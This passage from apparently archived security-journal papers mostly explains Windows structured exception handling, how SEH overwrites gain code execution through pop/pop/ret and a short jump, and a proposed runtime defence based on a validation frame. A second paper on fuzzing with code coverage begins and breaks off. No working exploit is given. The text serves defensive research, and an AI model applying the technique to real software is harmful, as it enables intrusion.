a software exception. A software exception, as one might expect,
originates from software rather than from the hardware. For example, in
the event that a process attempts to close an invalid handle, the
operating system may generate an exception.
One of the reasons that the word structured is included in structured
exception handling is because of the fact that it is used to dispatch
both hardware and software exceptions. This generalization makes it
possible for applications to handle all types of exceptions using a
common system, thus allowing for greater application flexibility when it
comes to error handling.
The most important detail of SEH, insofar as it pertains to this
document, is the mechanism through which applications can dynamically
register handlers to be called when various types of exceptions occur.
The act of registering an exception handler is most easily described as
inserting a function pointer into a chain of function pointers that are
called whenever an exception occurs. Each exception handler in the
chain is given the opportunity to either handle the exception or pass it
on to the next exception handler.
At a higher level, the majority of compiler-generated C/C++ functions
will register exception handlers in their prologue and remove them in
their epilogue. In this way, the exception handler chain mirrors the
structure of a thread's stack in that they are both LIFOs
(last-in-first-out). The exception handler that was registered last
will be the first to be removed from the chain, much the same as last
function to be called will be the first to be returned from.
To understand how the process of registering an exception handler
actually works in practice, it makes sense to analyze code that makes
use of exception handling. For instance, the code below illustrates what
would be required to catch all exceptions and then display the type of
exception that occurred:
__try
{
...
} __except(EXCEPTION_EXECUTE_HANDLER)
{
printf("Exception code: %.8x\n", GetExceptionCode());
}
In the event that an exception occurs from code inside of the try / except
block, the printf call will be issued and GetExceptionCode will return the
actual exception that occurred. For instance, if code made reference to an
invalid memory address, the exception code would be 0xc0000005, or
EXCEPTION_ACCESS_VIOLATION. To completely understand how this works, it is
necessary to dive deeper and take a look at the assembly that is generated from
the C code described above. When disassembled, the code looks something like
what is shown below:
00401000 55 push ebp
00401001 8bec mov ebp,esp
00401003 6aff push 0xff
00401005 6818714000 push 0x407118
0040100a 68a4114000 push 0x4011a4
0040100f 64a100000000 mov eax,fs:[00000000]
00401015 50 push eax
00401016 64892500000000 mov fs:[00000000],esp
0040101d 83c4f4 add esp,0xfffffff4
00401020 53 push ebx
00401021 56 push esi
00401022 57 push edi
00401023 8965e8 mov [ebp-0x18],esp
00401026 c745fc00000000 mov dword ptr [ebp-0x4],0x0
0040102d c6050000000001 mov byte ptr [00000000],0x1
00401034 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
0040103b eb2b jmp ex!main+0x68 (00401068)
0040103d 8b45ec mov eax,[ebp-0x14]
00401040 8b08 mov ecx,[eax]
00401042 8b11 mov edx,[ecx]
00401044 8955e4 mov [ebp-0x1c],edx
00401047 b801000000 mov eax,0x1
0040104c c3 ret
0040104d 8b65e8 mov esp,[ebp-0x18]
00401050 8b45e4 mov eax,[ebp-0x1c]
00401053 50 push eax
00401054 6830804000 push 0x408030
00401059 e81b000000 call ex!printf (00401079)
0040105e 83c408 add esp,0x8
00401061 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff
00401068 8b4df0 mov ecx,[ebp-0x10]
0040106b 64890d00000000 mov fs:[00000000],ecx
00401072 5f pop edi
00401073 5e pop esi
00401074 5b pop ebx
00401075 8be5 mov esp,ebp
00401077 5d pop ebp
00401078 c3 ret
The actual registration of the exception handler all occurs behind the scenes
in the C code. However, in the assembly code, the registration of the
exception handler starts at 0x0040100a and spans four instructions. It is
these four instructions that are responsible for registering the exception
handler for the calling thread. The way that this actually works is by
chaining an EXCEPTION_REGISTRATION_RECORD to the front of the list of exception
handlers. The head of the list of already registered exception handlers is
found in the ExceptionList attribute of the NT_TIB structure. If no exception
handlers are registered, this value will be set to 0xffffffff. The NT_TIB
structure makes up the first part of the TEB, or Thread Environment Block,
which is an undocumented structure used internally by Windows to keep track of
per-thread state in user-mode. A thread's TEB can be accessed in a
position-independent fashion by referencing addresses relative to the fs
segment register. For example, the head of the exception list chain be be
obtained through fs:[0].
To make sense of the four assembly instructions that register the custom
exception handler, each of the four instructions will be described
individually. For reference purposes, the layout of the
EXCEPTION_REGISTRATION_RECORD is described below:
+0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 Handler : Ptr32
1. push 0x4011a4
The first instruction pushes the address of the CRT generated excepthandler3
symbol. This routine is responsible for dispatching general exceptions that
are registered through the except compiler intrinsic. The key thing to note
here is that the virtual address of a function is pushed onto the stack that is
excepted to be referenced in the event that an exception is thrown. This push
operation is the first step in dynamically constructing an
EXCEPTION_REGISTRATION_RECORD on the stack by first setting the Handler
attribute.
2. mov eax,fs:[00000000]
The second instruction takes the current pointer to the first
EXCEPTION_REGISTRATION_RECORD and stores it in eax.
3. push eax
The third instruction takes the pointer to the first exception registration
record in the exception list and pushes it onto the stack. This, in turn, sets
the Next attribute of the record that is being dynamically generated on the
stack. Once this instruction completes, a populated
EXCEPTION_REGISTRATION_RECORD will exist on the stack that takes the following
form:
+0x000 Next : 0x0012ffb0
+0x004 Handler : 0x004011a4 ex!_except_handler3+0
4. mov fs:[00000000],esp
Finally, the dynamically generated exception registration record is stored as
the first exception registration record in the list for the current thread.
This completes the process of inserting a new registration record into the
chain of exception handlers.
The important things to take away from this description of exception handler
registration are as follows. First, the registration of exception handlers is
a runtime operation. This means that whenever a function is entered that makes
use of an exception handler, it must dynamically register the exception
handler. This has implications as it relates to performance overhead. Second,
the list of registered exception handlers is stored on a per-thread basis.
This makes sense because threads are considered isolated units of execution and
therefore exception handlers are only relative to a particular thread. The
final, and perhaps most important, thing to take away from this is that the
assembly generated by the compiler to register an exception handler at runtime
makes use of the current thread's stack. This fact will be revisited later in
this section.
In the event that an exception occurs during the course of normal execution,
the operating system will step in and take the necessary steps to dispatch the
exception. In the event that the exception occurred in the context of a thread
that is running in user-mode, the kernel will take the exception information
and generate an EXCEPTION_RECORD that is used to encapsulate all of the
exception information. Furthermore, a snapshot of the executing state of the
thread is created in the form of a populated CONTEXT structure. The kernel
then passes this information off to the user-mode thread by transferring
execution from the location that the fault occurred at to the address of
ntdll!KiUserExceptionDispatcher. The important thing to understand about this
is that execution of the exception dispatcher occurs in the context of the
thread that generated the exception.
The job of ntdll!KiUserExceptionDispatcher is, as the name implies, to dispatch
user-mode exceptions. As one might guess, the way that it goes about doing
this is by walking the chain of registered exception handlers stored relative
to the current thread. As the exception dispatcher walks the chain, it calls the
handler associated with each registration record, giving that handler the
opportunity to handle, fail, or pass on the exception.
While there are other things involved in the exception dispatching process,
this description will suffice to set the stage for how it might be abused to
gain code execution.
2.2) Gaining Code Execution
There is one important thing to remember when it comes to trying to gain code
execution through an SEH overwrite. Put simply, the fact that each exception
registration record is stored on the stack lends itself well to abuse when
considered in conjunction with a conventional stack-based buffer overflow. As
described in section , each exception registration record is composed of a Next
pointer and a Handler function pointer. Of most interest in terms of
exploitation is the Handler attribute. Since the exception dispatcher makes use
of this attribute as a function pointer, it makes sense that should this
attribute be overwritten with attacker controlled data, it would be possible to
gain code execution. In fact, that's exactly what happens, but with an added
catch.
While typical stack-based buffer overflows work by overwriting the return
address, an SEH overwrite works by overwriting the Handler attribute of an
exception registration record that has been stored on the stack. Unlike
overwriting the return address, where control is gained immediately upon return
from the function, an SEH overwrite does not actually gain code execution until
after an exception has been generated. The exception is necessary in order to
cause the exception dispatcher to call the overwritten Handler.
While this may seem like something of a nuisance that would make SEH overwrites
harder to exploit, it's not. Generating an exception that leads to the calling
of the Handler is as simple as overwriting the return address with an invalid
address in most cases. When the function returns, it attempts to execute code
from an invalid memory address which generates an access violation exception.
This exception is then passed onto the exception dispatcher which calls the
overwritten Handler.
The obvious question to ask at this point is what benefit SEH overwrites have
over the conventional practice of overwriting the return address. To
understand this, it's important to consider one of the common practices
employed in Windows-based exploits. On Windows, thread stack addresses tend to
change quite frequently between operating system revisions and even across
process instances. This differs from most UNIX derivatives where stack
addresses are typically predictable across multiple operating system revisions.
Due to this fact, most Windows-based exploits will indirectly transfer control
into the thread's stack by first bouncing off an instruction that exists
somewhere in the address space. This instruction must typically reside at an
address that is less prone to change, such as within the code section of a
binary. The purpose of this instruction is to transfer control back to the
stack in a position-independent fashion. For example, a jmp esp instruction
might be used. While this approach works perfectly fine, it's limited by
whether or not an instruction can be located that is both portable and reliable
in terms of the address that it resides at. This is where the benefits of SEH
overwrites begin to become clear.
When simply overwriting the return address, an attacker is often limited to a
small set of instructions that are not typically common to find at a reliable
and portable location in the address space. On the other hand, SEH overwrites
have the advantage of being able to use another set of instructions that are
far more prevalent in the address space of most every process. This set of
instructions is commonly referred to as pop/pop/ret. The reason this class of
instructions can be used with SEH overwrites and not general stack overflows
has to do with the method in which exception handlers are called by the
exception dispatcher. To understand this, it is first necessary to know what
the specific prototype is for the Handler field in the
EXCEPTION_REGISTRATION_RECORD structure:
typedef EXCEPTION_DISPOSITION (*ExceptionHandler)(
IN EXCEPTION_RECORD ExceptionRecord,
IN PVOID EstablisherFrame,
IN PCONTEXT ContextRecord,
IN PVOID DispatcherContext);
The field of most importance is the EstablisherFrame. This field actually
points to the address of the exception registration record that was pushed onto
the stack. It is also located at [esp+8] when the Handler is called.
Therefore, if the Handler is overwritten with the address of a pop/pop/ret
sequence, the result will be that the execution path of the current thread will
be transferred to the address of the Next attribute for the current exception
registration record. While this field would normally hold the address of the
next registration record, it instead can hold four bytes of arbitrary code that
an attacker can supply when triggering the SEH overwrite. Since there are only
four contiguous bytes of memory to work with before hitting the Handler field,
most attackers will use a simple short jump sequence to jump past the handler
and into the attacker controlled code that comes after it.
3) Design
The one basic requirement of any solution attempting to prevent the leveraging
of SEH overwrites is that it must not be possible for an attacker to be able to
supply a value for the Handler attribute of an exception registration record
that is subsequently used in an unchecked fashion by the exception dispatcher
when an exception occurs. If a solution can claim to have satisfied this
requirement, then it should be true that the solution is secure.
To that point, Microsoft's solution is secure, but only if all of the images
loaded in the address space have been compiled with /SAFESEH. Even then, it's
possible that it may not be completely secure For example, it should be
possible to overwrite the Handler with the address of some non-image associated
executable region, if one can be found. If there are any images that have not
been compiled with /SAFESEH, it may be possible for an attacker to overwrite
the Handler with an address of an instruction that resides within an
unprotected image. The reason Microsoft's implementation cannot protect
against this is because SafeSEH works by having the exception dispatcher
validate handlers against a table of image-specific safe exception handlers
prior to calling an exception handler. Safe exception handlers are stored in a
table that is contained in any executable compiled with /SAFESEH. Given this
limitation, it can also be said that Microsoft's implementation is not secure
given the appropriate conditions. In fact, for third-party applications, and
even some Microsoft-provided applications, these conditions are considered by
the author to be the norm rather than the exception. In the end, it all boils
down to the fact that Microsoft's solution is a compile-time solution rather
than a runtime solution. With these limitations in mind, it makes sense to
attempt to approach the problem from the angle of a runtime solution rather
than a compile-time solution.
When it comes to designing a runtime solution, the important consideration that
has to be made is that it will be necessary to intercept exceptions before they
are passed off to the registered exception handlers by the exception
dispatcher. The particulars of how this can be accomplished will be discussed
in chapter . Assuming a solution is found to the layering problem, the next
step is to come up with a solution for determining whether or not an exception
handler is valid and has not been tampered with. While there are many
inefficient solutions to this problem, such as coming up with a solution to
keep a ``secure'' list of registered exception handlers, there is one solution
in particular that the author feels is bested suited for the problem.
One of the side effects of an SEH overwrite is that the attacker will typically
clobber the value of the Next attribute associated with the exception
registration record that is overwritten. This occurs because the Next
attribute precedes the Handler attribute in memory, and therefore must be
overwritten before the Handler in the case of a typical buffer overflow. This
has a very important side effect that is the key to facilitating the
implementation of a runtime solution. In particular, the clobbering of the
Next attribute means that all subsequent exception registration records would
not be reachable by the exception dispatcher when walking the chain.
Consider for the moment a solution that, during thread startup, places a custom
exception registration record as the very last exception registration record in
the chain. This exception registration record will be symbolically referred to
as the validation frame henceforth. From that point forward, whenever an
exception is about to be dispatched, the solution could walk the chain prior to
allowing the exception dispatcher to handle the exception. The purpose of
walking the chain before hand is to ensure that the validation frame can be
reached. As such, the validation frame's purpose is similar to that of stack
canaries. If the validation frame can be reached, then that is evidence of the
fact that the chain of exception handlers has not been corrupted. As described
above, the act of overwriting the Handler attribute also requires that the Next
pointer be overwritten. If the Next pointer is not overwritten with an address
that ensures the integrity of the exception handler chain, then this solution
can immediately detect that the integrity of the chain is in question and
prevent the exception dispatcher from calling the overwritten Handler.
Using this technique, the act of ensuring that the integrity of the exception
handler chain is kept intact results in the ability to prevent SEH overwrites.
The important questions to ask at this point center around what limitations
this solution might have. The most obvious question to ask is what's to stop
an attacker from simply overwriting the Next pointer with the value that was
already there. There are a few things that stop this. First of all, it will
be common that the attacker does not know the value of the Next pointer.
Second, and perhaps most important, is that one of the benefits of using an SEH
overwrite is that an attacker can make use of a pop/pop/ret sequence. By
forcing an attacker to retain the value of the Next pointer, the major benefit
of using an SEH overwrite in the first place is gone. Even conceding this
point, an attacker who is able to retain the value of the Next pointer would
find themselves limited to overwriting the Handler with the address of
instructions that indirectly transfer control back to their code. However, the
attacker won't simply be able to use an instruction like jmp esp because the
Handler will be called in the context of the exception dispatcher. It's at
this point that diminishing returns are reached and an attacker is better off
simply overwriting the return address, if possible.
Another important question to ask is what's to stop the attacker from
overwriting the Next pointer with the address of the validation frame itself
or, more easily, with 0xffffffff. The answer to this is much the same as
described in the above paragraph. Specifically, by forcing an attacker away
from the pop/pop/ret sequence, the usefulness of the SEH overwrite vector
quickly degrades to the point of it being better to simply overwrite the return
address, if possible. However, in order to be sure, the author feels that
implementations of this solution would be wise to randomize the location of the
validation frame.
It is the author's opinion that the solution described above satisfies the
requirement outlined in the beginning of this chapter and therefore qualifies
as a secure solution. However, there's always a chance that something has been
missed. For that reason, the author is more than happy to be proven wrong on
this point.
4) Implementation
The implementation of the solution described in the previous chapter relies on
intercepting exceptions prior to allowing the native exception dispatcher to
handle them such that the exception handler chain can be validated. First and
foremost, it is important to identify a way of layering prior to the point that
the exception dispatcher transfers control to the registered exception
handlers. There are a few different places that this layering could occur at,
but the one that is best suited to catch the majority of user-mode exceptions
is at the location that ntdll!KiUserExceptionDispatcher gains control.
However, by hooking ntdll!KiUserExceptionDispatcher, it is possible that this
implementation may not be able to intercept all cases of an exception being
raised, thus making it potentially feasible to bypass the exception handler
chain validation.
The best location would be to layer at would be ntdll!RtlDispatchException. The
reason for this is that exceptions raised through ntdll!RtlRaiseException, such
as software exceptions, may be passed directly to ntdll!RtlDispatchException
rather than going through ntdll!KiUserExceptionDispatcher first. The condition
that controls this is whether or not a debugger is attached to the user-mode
process when ntdll!RtlRaiseException is called. The reason
ntdll!RtlDispatchException is not hooked in this implementation is because it
is not directly exported. There are, however, fairly reliable techniques that
could be used to determine its address. As far as the author is aware, the act
of hooking ntdll!KiUserExceptionDispatcher should mean that it's only possible
to miss software exceptions which are much harder, and in most cases
impossible, for an attacker to generate.
In order to layer at ntdll!KiUserExceptionDispatcher, the first few
instructions of its prologue can be overwritten with an indirect jump to a
function that will be responsible for performing any sanity checks necessary.
Once the function has completed its sanity checks, it can transfer control back
to the original exception dispatcher by executing the overwritten instructions
and then jumping back into ntdll!KiUserExceptionDispatcher at the offset of the
next instruction to be executed. This is a nice and ``clean'' way of
accomplishing this and the performance overhead is miniscule Where ``clean'' is
defined as the best it can get from a third-party perspective.
In order to hook ntdll!KiUserExceptionDispatcher, the first n instructions,
where n is the number of instructions that it takes to cover at least 6 bytes,
must be copied to a location that will be used by the hook to execute the
actual ntdll!KiUserExceptionDispatcher. Following that, the first n
instructions of ntdll!KiUserExceptionDispatcher can then be overwritten with an
indirect jump. This indirect jump will be used to transfer control to the
function that will validate the exception handler chain prior to allowing the
original exception dispatcher to handle the exception.
With the hook installed, the next step is to implement the function that will
actually validate the exception handler chain. The basic steps involved in
this are to first extract the head of the list from fs:[0] and then iterate
over each entry in the list. For each entry, the function should validate that
the Next attribute points to a valid memory location. If it does not, then the
chain can be assumed to be corrupt. However, if it does point to valid memory,
then the routine should check to see if the Next pointer is equal to the
address of the validation frame that was previously stored at the end of the
exception handler chain for this thread. If it is equal to the validation
frame, then the integrity of the chain is confirmed and the exception can be
passed to the actual exception dispatcher.
However, if the function reaches an invalid Next pointer, or it reaches
0xffffffff without encountering the validation frame, then it can assume that
the exception handler chain is corrupt. It's at this point that the function
can take whatever steps are necessary to discard the exception, log that a
potential exploitation attempt occurred, and so on. The end result should be
the termination of either the thread or the process, depending on
circumstances. This algorithm is captured by the pseudo-code below:
01: CurrentRecord = fs:[0];
02: ChainCorrupt = TRUE;
03: while (CurrentRecord != 0xffffffff) {
04: if (IsInvalidAddress(CurrentRecord->Next))
05: break;
06: if (CurrentRecord->Next == ValidationFrame) {
07: ChainCorrupt = FALSE;
08: break;
09: }
10: CurrentRecord = CurrentRecord->Next;
11: }
12: if (ChainCorrupt == TRUE)
13: ReportExploitationAttempt();
14: else
15: CallOriginalKiUserExceptionDispatcher();
The above algorithm describes how the exception dispatching path should be
handled. However, there is one important part remaining in order to implement
this solution. Specifically, there must be some way of registering the
validation frame with a thread prior to any exceptions being dispatched on that
thread. There are a few ways that this can be accomplished. In terms of a
proof of concept, the easiest way of doing this is to implement a DLL that,
when loaded into a process' address space, catches the creation notification of
new threads through a mechanism like DllMain or through the use of a TLS
callback in the case of a statically linked library. Both of these approaches
provide a location for the solution to establish the validation frame with the
thread early on in its execution. However, if there were ever a case where the
thread were to raise an exception prior to one of these routines being called,
then the solution would improperly detect that the exception handler chain was
corrupt.
One solution to this potential problem is to store state relative to each
thread that keeps track of whether or not the validation frame has been
registered. There are certain implications about doing this, however. First,
it could introduce a security problem in that an attacker might be able to
bypass the protection by somehow toggling the flag that tracks whether or not
the validation frame has been registered. If this flag were to be toggled to
no and an exception were generated in the thread, then the solution would have
to assume that it can't validate the chain because no validation frame has been
installed. Another issue with this is that it would require some location to
store this state on a per-thread basis. A good example of a place to store
this is in TLS, but again, it has the security implications described above.
A more invasive solution to the problem of registering the validation frame
would be to somehow layer very early on in the thread's execution -- perhaps
even before it begins executing from its entry point. The author is aware of a
good way to accomplish this, but it will be left as an exercise to the reader
on what this might be. This more invasive solution is something that would be
an easy and elegant way for Microsoft to include support for this, should they
ever choose to do so.
The final matter of how to go about implementing this solution centers around
how it could be deployed and used with existing applications without requiring
a recompile. The easiest way to do this in a proof of concept setting would be
to implement these protection mechanisms in the form of a DLL that can be
dynamically loaded into the address space of a process that is to be protected.
Once loaded, the DLL's DllMain can take care of getting everything set up. A
simple way to cause the DLL to be loaded is through the use of AppInitDLLs,
although this has some limitations. Alternatively, there are more invasive
options that can be considered that will accomplish the goal of loading and
initializing the DLL early on in process creation.
One interesting thing about this approach is that while it is targeted at being
used as a runtime solution, it can also be used as a compile-time solution.
This means that applications can use this solution at compile-time to protect
themselves from SEH overwrites. Unlike Microsoft's solution, this will even
protect them in the presence of third-party images that have not been compiled
with the support. This can be accomplished through the use of a static library
that uses TLS callbacks to receive notifications when threads are created, much
like DllMain is used for DLL implementations of this solution.
All things considered, the author believes that the implementation described
above, for all intents and purposes, is a fairly simplistic way of providing
runtime protection against SEH overwrites that has minimal overhead. While the
implementation described in this document is considered more suitable for a
proof-of-concept or application-specific solution, there are real-world
examples of more robust implementations, such as in Wehnus's WehnTrust product,
a commercial side-project of the author's. Apologies for the shameless plug.
5) Compatibility
Like most security solutions, there are always compatibility problems that must
be considered. As it relates to the solution described in this paper, there
are a couple of important things to keep in mind.
The first compatibility issue that might happen in the real world is a scenario
where an application invalidates the exception handler chain in a legitimate
fashion. The author is not currently aware of situations where an application
would legitimately need to do this, but it has been observed that some
applications, such as cygwin, will do funny things with the exception handler
chain that are not likely to play nice with this form of protection. In the
event that an application invalidates the exception handler chain, the solution
described in this paper may inadvertently detect that an SEH overwrite has
occurred simply because it is no longer able to reach the validation frame.
Another compatibility issue that may occur centers around the fact that the
implementation described in this paper relies on the hooking of functions. In
almost every situation it is a bad idea to use function hooking, but there are
often situations where there is no alternative, especially in closed source
environments. The use of function hooking can lead to compatibility problems
with other applications that also hook ntdll!KiUserExceptionDispatcher. There
may also be instances of security products that detect the hooking of
ntdll!KiUserExceptionDispatcher and classify it as malware-like behavior. In
any case, these compatibility concerns center less around the fundamental
concept and more around the specific implementation that would be required of a
third-party.
6) Conclusion
Software-based vulnerabilities are a common problem that affect a wide array of
operating systems. In some cases, these vulnerabilities can be exploited with
greater ease depending on operating system specific features. One particular
case of where this is possible is through the use of an SEH overwrite on 32-bit
applications on the Windows platform. An SEH overwrite involves overwriting the
Handler associated with an exception registration record. Once this occurs, an
exception is generated that results in the overwritten Handler being called.
As a result of this, the attacker can more easily gain control of code
execution due to the context that the exception handler is called in.
Microsoft has attempted to address the problem of SEH overwrites with
enhancements to the exception dispatcher itself and with solutions like SafeSEH
and the /GS compiler flag. However, these solutions are limited because they
require a recompilation of code and therefore only protect images that have
been compiled with these flags enabled. This limitation is something that
Microsoft is aware of and it was most likely chosen to reduce the potential for
compatibility issues.
To help solve the problem of not offering complete protection against SEH
overwrites, this paper has suggested a solution that can be used without any
code recompilation and with negligible performance overhead. The solution
involves appending a custom exception registration record, known as a
validation frame, to the end of the exception list early on in thread startup.
When an exception occurs in the context of a thread, the solution intercepts
the exception and validates the exception handler chain for the thread by
making sure that it can walk the chain until it reaches the validation frame.
If it is able to reach the validation frame, then the exception is dispatched
like normal. However, if the validation frame cannot be reached, then it is
assumed that the exception handler chain is corrupt and that it's possible that
an exploit attempt may have occurred. Since exception registration records are
always prepended to the exception handler chain, the validation frame is
guaranteed to always be the last handler.
This solution relies on the fact that when an SEH overwrite occurs, the Next
attribute is overwritten before overwriting the Handler attribute. Due to the
fact that attackers typically use the Next attribute as the location at which
to store a short jump, it is not possible for them to both retain the integrity
of the list and also use it as a location to store code. This important
consequence is the key to being able to detect and prevent the leveraging of an
SEH overwrite to gain code execution.
Looking toward the future, the usefulness of this solution will begin to wane
as 64-bit versions of Windows begin to dominate the desktop environment. The
reason 64-bit versions are not affected by this solution is because exception
handling on 64-bit versions of Windows is inherently secure due to the way it's
been implemented. However, this only applies to 64-bit binaries. Legacy
32-bit binaries that are capable of running on 64-bit versions of Windows will
continue to use the old style of exception handling, thus potentially leaving
them vulnerable to the same style of attacks depending on what compiler flags
were used. On the other hand, this solution will also become less necessary due
to the fact that modern 32-bit x86 machines support hardware NX and can
therefore help to mitigate the execution of code from the stack. Regardless of
these facts, there will always be a legacy need to protect against SEH
overwrites, and the solution described in this paper is one method of providing
that protection.
A. References
Borland. United States Patent: 5628016.
http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=2Fnetahtml2FPTO2Fsrchnum.htm&r=1&f=G&l=50&s1=5,628,016.PN.&OS=PN/5,628,016&RS=PN/5,628,016;
accessed Sep 5, 2006.
Litchfield, David. Defeating the Stack based Buffer
Overflow Prevention Mechanism of Microsoft Windows 2003 Server.
http://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf;
accessed Sep 5, 2006.
Microsoft Corporation. Structured Exception Handling.
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/structured_exception_handling.asp;
accessed Sep 5, 2006.
Microsoft Corporation. Working with the AppInitDLLs
registry value.
http://support.microsoft.com/default.aspx?scid=kb;en-us;197571;
accessed Sep 5, 2006.
Microsoft Corporation. /GS (Buffer Security Check)
http://msdn2.microsoft.com/en-us/library/8dbf701c.aspx;
accessed Sep 5, 2006.
Nagy, Ben. SEH (Structured Exception Handling) Security
Changes in XPSP2 and 2003 SP1.
http://www.eeye.com/html/resources/newsletters/vice/VI20060830.html#vexposed;
accessed Sep 8, 2006.
Pietrek, Matt. A Crash Course on the Depths of Win32
Structured Exception Handling.
http://www.microsoft.com/msj/0197/exception/exception.aspx;
accessed Sep 8, 2006.
skape. Improving Automated Analysis of Windows x64
Binaries.
http://www.uninformed.org/?v=4&a=1&t=sumry; accessed
Sep 5, 2006.
Wehnus. WehnTrust.
http://www.wehnus.com/products.pl; accessed Sep 5,
2006.
Wikipedia. Matryoshka Doll.
http://en.wikipedia.org/wiki/Matryoshka_doll;
accessed Sep 18, 2006.
Wine. CompilerExceptionSupport.
http://wiki.winehq.org/CompilerExceptionSupport;
accessed Sep 5, 2006.

659
uninformed/5.3.txt Normal file
View File

@ -0,0 +1,659 @@
Effective Bug Discovery
9/2006
vf
vf@nologin.org
"If we knew what it was we were doing, it would not be
called research, would it?"
- Albert Einstein
1) Foreword
Abstract: Sophisticated methods are currently being developed and
implemented for mitigating the risk of exploitable bugs. The process of
researching and discovering vulnerabilities in modern code will require
changes to accommodate the shift in vulnerability mitigations. Code
coverage analysis implemented in conjunction with fuzz testing reveals
faults within a binary file that would have otherwise remained
undiscovered by either method alone. This paper suggests a research
method for more effective runtime binary analysis using the
aforementioned strategy. This study presents empirical evidence that
despite the fact that bug detection will become increasingly difficult
in the future, analysis techniques have an opportunity to evolve
intelligently.
Disclaimer: Practices and material presented within this paper are meant
for educational purposes only. The author does not suggest using this
information for methods which may be deemed unacceptable. The content in
this paper is considered to be incomplete and unfinished, and therefore
some information in this paper may be incorrect or inaccurate.
Permission to make digital or hard copies of all or part of this work
for personal or classroom use is granted without fee provided that
copies are not made or distributed for profit or commercial advantage
and that copies bear this notice and the full citation on the first
page. To copy otherwise, to republish, requires prior specific
permission.
Prerequisites: For an in-depth understanding of the concepts presented
in this paper, a familiarity with Microsoft Windows device drivers,
working with x86 assembler, debugging fundamentals, and the Windows
kernel debugger is required. A brief introduction to the current state
of code coverage analysis, including related uses, is introduced to
support information presented within this paper. However, to implement
the practices within this paper a deeper knowledge of aforementioned
vulnerability discovery methods and methodologies are required. The
following software and knowledge of its use is required to follow along
with the discussion: IDAPro, Debugging tools for Windows, Debug Stalk,
and a virtual machine such as VMware or Virtual PC.
Thanks: The author would like to thank west, icer, skape, Uninformed,
and mom.
2) Introduction
2.1) The status of vulnerability research
Researchers employ a myriad of investigative techniques in the quest for
vulnerabilities. In any case, there exists no silver bullet for the
discovery of security related software bugs, not to mention the fact
that several new security oriented kernel-mode components have recently
been integrated into Microsoft operating systems that can make
vulnerability investigations more difficult. Vista, particularly on the
64-bit edition, is integrating several mechanisms including driver
signing, Secure Bootup using a TPM hardware chip, PatchGuard,
kernel-mode integrity checks, and restricted user-mode access to . The
Vista kernel also has an improved Low Fragmentation Heap and Address
Space Layout Randomization. In later days, bugs were revealed via dumb
fuzzing techniques, whereas this year more complicated bugs are
indicating that knowledge of the format would require advanced
understanding of a parser. Because of this, researchers are moving
towards different discovery methods such as intelligent, rather than
dumb, testing of drivers and applications.
2.2) The problem with fuzzing
To compound the conception that these environments are becoming more
difficult to test, monolithic black box fuzz testing, while frequently
efficacious in its purpose, has a tendency for a exhibiting a lack of
potency. The term ``monolithic'' is included as a reference to a
comprehensive execution of the entire application or driver. Fuzzing is
often executed in an environment where the tester does not know the
internals of the binary in question. This leads to disadvantages in
which a large number of tests must be executed to get an accurate
estimate of binary's reliability. This investigation can be a daunting
task if not implemented in a constructive manner. The test program and
data selection should ensure independence from unrelated tests or groups
of tests, thereby gaining the ability of complete coverage by reducing
dependency on specific variables and their decision branching.
Another disadvantage of monolithic black box fuzz testing is that it is
difficult to provide coverage analysis even though the testing selection
may cover the entire suite of security testing models. A further
complication in this nature of testing is of cyclic dependency causing
cyclic arguments which in turn leads to a lessening of coverage
assurance.
2.3) Expectations
This paper aims to educate the reader on the espousal of code coverage
analysis and fuzzing philosophy presented by researchers as a means to
lighten the burden of bug detection. A kernel mode device driver will be
fuzzed for bugs using a standard fuzzing method. Results from the
initial fuzzing test will be examined to determine coverage. The fuzz
testing method will be revised to accommodate coverage concerns and an
execution graph is generated to view the results of the previous
testing. A comparison is then made between the two prior testing
methods, proving how effective code coverage analysis through kernel
mode Stalking can improve fuzzing endeavors.
3) QA
Before understanding how the methodologies presented in this paper can
be used, a few simple definitions and descriptions are addressed for the
benefit of the reader.
3.1) What is code coverage?
Code coverage, as represented by a Control Flow Graph (CFG), is defined
as a measure of the exercised code within a program undergoing software
testing. For the purpose of vulnerability research, the goal is to
utilize code coverage analysis to obtain an exhaustive execution of all
possible paths through code and data flow that may be relevant for
revealing failures. It is used as a good metric in determining how a
specific set of tests can uncover numerous faults. Techniques of proper
code coverage analysis presented in this paper utilize basic
mathematical properties of graph theory by including elements such as
vertices, links and edges. Graph theory has lain somewhat dormant until
recently being utilized by computer scientists which have subsequently
defined their own sets of vocabulary for the subject. For the sake of
research continuity and to link mathematical to computer science
definitions, the verbiage used within this paper will equate vertices to
code blocks, branches to decisions, and edges to code paths.
To support our hypothesis, the aforementioned graph theory elements are
compiled into CFGs. Informally, a Control Flow Graph is a directed graph
composed of a finite set of vertices connected by edges indicating all
possible routes a driver or application may take during execution. In
other words, a CFG is merely blocks of code whose connected flow paths
are determined by decisions. Block execution consists of a sequence of
instructions which are free of branching or other control transfers
except for the last instruction. These include branches or decisions
which consist of Boolean expressions in a control structure. A path is a
sequence of nodes traveled through by a series of uninterrupted links.
Paths enable flow of information or data through code. In our case, a
path is an execution flow and is therefore essential to measuring code
coverage. Because of this factor, this investigation focuses directly on
determining which paths have been traversed, which blocks and
correlating data have been executed, and which links have been followed
and finally applying it to fuzzing techniques.
The purpose of code coverage analysis is ultimately to require all
control decisions to be exercised. In other words, the application
needs to be executed thoroughly using enough inputs that all edges in
the graph are traversed at least once. These graphs will be represented
as diagrams in which blocks are squares, edges are lines, and paths are
colored.
4) Hypothesis: Code Coverage and Fuzzing
In the security arena, fuzzing has traditionally manifested potential
security holes by throwing random garbage at a target, hoping that any
given code path will fail in the process of consuming the aforementioned
data. The possibility of execution flowing through a particular block in
code is the sum of probabilities of the conditional branches leading to
blocks. In simplicity, if there are areas of code that are never
executed during typical fuzz testing, then administering code coverage
methodologies will reveal those unexecuted branches. Graphical code
coverage analysis using CFGs helps determine which code path has been
executed even without the use of symbol tables. This process allows the
tester to more easily identify branch execution, and to subsequently
design fuzz testing methods to properly attain complete code coverage.
Prior experiments driven at determining the effectiveness of code
coverage techniques identify that ensuring branch execution coverage
will improve the likelihood of discovery of binary faults.
4.1) Process and Kernel Stalking
One of the more difficult questions to answer when testing software for
vulnerabilities is: ``when is the testing considered finished?'' How do
we, as vulnerability bug hunters, know when we have completed our
